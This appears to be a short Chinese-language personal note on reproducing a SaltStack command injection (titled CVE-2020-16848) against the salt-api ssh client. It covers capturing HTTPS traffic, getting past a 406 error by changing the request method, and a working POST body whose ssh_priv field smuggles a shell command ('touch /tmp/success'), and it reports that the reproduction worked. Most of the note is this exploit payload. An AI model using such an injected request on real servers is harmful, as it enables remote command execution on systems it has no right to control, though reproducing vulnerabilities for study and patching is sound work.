CVE-2020-16848 SaltStack命令注入返回406 Not acceptable


协议

首先,抓包的时候抓的是https的包,不是HTTP包。

请求方法

经测试,直接把GET修改为POST不可以,会出现406的问题。

需要右键Change Request Method

8d9ad53040aa08f588eac52bb188bd40.png

post body

token=12312&client=ssh&tgt=*&fun=a&roster=whip1ash&ssh_priv=aaa|touch%20/tmp/success%3b

复现成功

83addde3c809ef5935c8b1be56629717.png


无涯 2024年2月22日 18:12 收藏文档